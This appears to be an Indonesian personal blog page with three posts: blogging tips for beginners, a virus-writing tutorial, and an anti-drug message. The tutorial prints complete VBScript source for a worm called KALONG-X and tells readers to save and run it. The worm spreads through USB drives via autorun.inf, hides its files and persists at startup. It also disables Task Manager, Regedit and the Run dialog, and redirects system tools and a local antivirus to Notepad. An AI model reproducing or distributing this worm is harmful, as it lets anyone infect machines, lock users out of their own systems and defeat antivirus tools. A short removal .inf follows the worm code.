Posted in 30 May 2009
by DareDeviL

Ngeblog atau ber-aktifitas melalui blog memang sangat menyenangkan. Apalagi bagi yang udah punya komunitas blogging. Meski hanya duduk didepan komputer, rasanya kita bisa nyampe di belahan dunia lain. Hal ini juga yang saya rasakan. Tetapi benarkah aktifitas blogging benar2 menyenangkan?

Tulisan ini saya kususkan bagi mereka yang belum pernah masuk di dunia blog. Sedangkan bagi para senior, lebih baik anda tutup saja halaman ini. Karena yang saya tulis disini hanya untuk mereka yang belum pernah mengenal blog alias pemula.

Yang wajib dipersiapkan bagi blogger (orang yang mengelola blog) adalah:

    1. Pilihlah koneksi internet yang stabil. Yang kita perlukan adalah koneksi jaringan yang stabil. Karena dengan stabilitas koneksi jaringan, aktifitas ngeblog anda akan lancar. Jadi carilah refferensi jaringan internet yang stabil.
    Catatan: Jaringan yang stabil di kota saya, belum tentu stabil di kota anda.

    2. Mencoba cari tahu (bertanya) kepada blogger di kota anda tentang aktifitas ngeblog mereka (secara Offline). Hal ini untuk meminimalkan terperosoknya anda oleh iming2 iklan di internet.

    3. Pilihlah sebuah host gratisan yang terpercaya. Nah anda hanya akan mendapatkan informasi akurat jika anda berkonsultasi pada blogger setempat (dikota anda) secara Offline. Karena pada dasarnya semua fasilatas gratisan di dunia maya ini selalu penuh dengan Plus Minusnya. Demikian halnya dengan Host untuk blog anda.

    4. Gunakan url sub domain gratisan untuk belajar bikin blog. Lagi2 dibutuhkan panduan dari mereka yang udah pernah bikin blog secara Offline.

    5. Jika sudah berhasil membuat 1 blog, jangan fikirkan untuk membuat blog lain dulu. Fokuskan perhatian dan tulisan kita pada blog baru kita tadi. Kesalahan yang sering terjadi adalah pemula selalu bikin blog lebih dari 2 blog pada host gratisan (termasuk saya, meski akirnya saya serahkan pada kawan yang lain) dan akirnya blog2 tadi malah terbengkalai gara2 kehabisan bahan untuk nulis.

    6. Dalam menulis artikel di blog baru, kita nggak usah terlalu fokus pada sebuah tema pembicaraan. Tulislah apa yang ingin anda tulis. Istilah kasarnya Pokoknya asal nulis dulu. Itung2 latihan nulis.

    7. Mintalah bantuan kepada kawan senior anda untuk mengoptimasi tampilan dan pengaturan pada blog baru kita ini agar tidak berujung dengan kesalahan fatal. Outodidak lebih banyak berakir dengan kata2 "Wah ternyata salah, coba kalo kemarin dibikin begini... begini.." (kecuali kalo kita faham betul dengan bahasa komputer, kode2 css, dan HTML).

    8. Carilah refferensi tentang istilah2 internet dan istilah2 blogging. Kita dapat memanfaatkan search engine seperti google atau yahoo untuk kepentingan ini.

    9. Jangan langsung anda terapkan sebuah tutorial yang anda dapatkan dari sebuah artikel tanpa petunjuk yang jelas dari kawan senior anda. Ini bukan berarti artikel yang anda baca tadi menyesatkan. Tapi keterbatasan pengetahuan kita (sebagai pemula) sering berakibat kesalahan penerapan tutorial tadi.

    10. Jangan abaikan tingkat security computer anda. Pasanglah Firewall dan antivirus yang selalu ter-updates. Karena salah satu pendukung aktifitas ngeblog kita adalah komputer yang sehat dari segi sofware dan hardware. Jadi jangan abaikan artikel2 tentang komputer dan cara2 pengamanan datanya.
Saya berharap untuk masih diberi kemampuan agar dapat melanjutkan tulisan ini pada post mendatang.

Read more

Membuat Virus Memakai Notepad 2

Posted in
by DareDeviL


Membuat Virus Memakai Notepad 2 by Muh. Khalil

Hi….. brikut cara pembuatan virus dengan menggunakan notepad
Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan :)
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::” ‘File Hidden tak terlihat kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD” ‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD” ‘Buat pesan saat Windows Startup kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X” kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic” ‘Aktifkan saat Windows Startup kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs” ‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe” ‘Bonus if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :

Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

Read more

BARRU BERSIH DARI NARKOBA

Posted in 28 May 2009
by DareDeviL


Polisi Bersosialisasi kebeberapa daerah di Kab.Barru terutama di sekolah-sekolah Menengah Atas dan di sekolah Menengah Pertama. Polisi pihak yang berwajib meminta kepada generasi muda Kota Barru agar lebih berhati-hati, karena Indonesia dewasa tidak hanya perang dalam menghadapi penjajah dan mengatasi Bencana Alam, tetapi perang melawan Narkoba.

Narkoba menjadi salah satu cara dalam perang di era modern untuk merusak mental dan moral generasi muda yang menjadi harapan bangsa selanjutnya. Di era modern ini lebih efisien dan sangat luar biasa untuk menghancurkan moral suatu bangsa. Selain melalui film/VCD porno, internet juga melalui peredaran Narkoba.

Penyalahgunaan Narkoba adalah penggunaan Narkoba yang dilakukan tidak untuk maksud pengobatan, tetapi karena ingin menikmati pengaruhnya, dalam jumlah berlebih yang secara kurang teratur, dan berlangsung cukup lama. Sehingga menyebabkan gangguan kesehatan fisik, mental, dan kehidupan social.

Contoh hal-hal yang dapat mendorong penggunaan (penyalahgunaan) Narkoba, yakni :
1. Keyakinan adiktif, yakin terhadap diri sendiri tentang orang-orang
lain disekitarnya.
2. Kepribadian adiktif, terobsesi (terfokus) pada diri sendiri,
kurangnya jati diri, hidup tanpa makna dan tujuan, mencari persetujuan orang lain, tidak mampu mengendalikan kemarahan dan depresi.
3. Ketidakmampuan menghadapi masalah.
4. Tidak terpenuhnya kebutuhan emosional, social dan spiritual.
5. Kurangnya dukungan social.








Suasana yang dulunya religius oleh tatanah islami, ulama dan santun semakin hari semakin jauh. Yang terlihat akhir-akhir ini, betapa pengaruh nilai-nilai asing dan hilang kendali diri membuat generasi muda gampang terperangkap dalam kasus pemakaian serta pengedaran Narkoba.

Pelaku pengedar Narkoba pantas dihukum mati, karena dapat merusak moral dan mental generasi muda harapan bangsa, “kata Polisi, dalam rangka memerangi Narkoba harus ada kesadaran dari masyarakat, para pemimpin, etit politik untuk terus mengurusi generasi muda agar jangan terjerumus ke kasus pengedaran serta penyalahgunaan obat haram itu (Narkoba)”.

Jadi adik-adik sekalian jangan pernah mencoba yang namanya Narkoba, karena dapat merusak diri adik-adik sendiri serta menyebabkan ketergantungan. Kalau adik-adik memakai Narkoba fungsi otak dapat terganggu, keracunan, over dosis, serta dapat mengubah perilaku/mental social adik-adik. Biarpun adik-adik dipaksa untuk “memakai”, jangan!! biarpun gratis karena pertama memang gratis, tetapi kalau adik-adik sudah kecanduan (mengalami ketergantungan) pasti adik-adik akan membeli sendiri barang haram tersebut.

Untuk itu marilah kita bersama-sama memberantas Narkoba dari lingkungan kita, cegah dan jauhilah Narkoba. Kita sebagai generasi muda harus memerangi hal-hal yang dapat merugikan bangsa kita, terutama Narkoba. “Katakan tidak pada Narkoba (SAY NO TO DRUGS)”.

Read more

Game Penghasil Euro

Join khalilmn3's empire
Copyright 2010 @ DareDeviL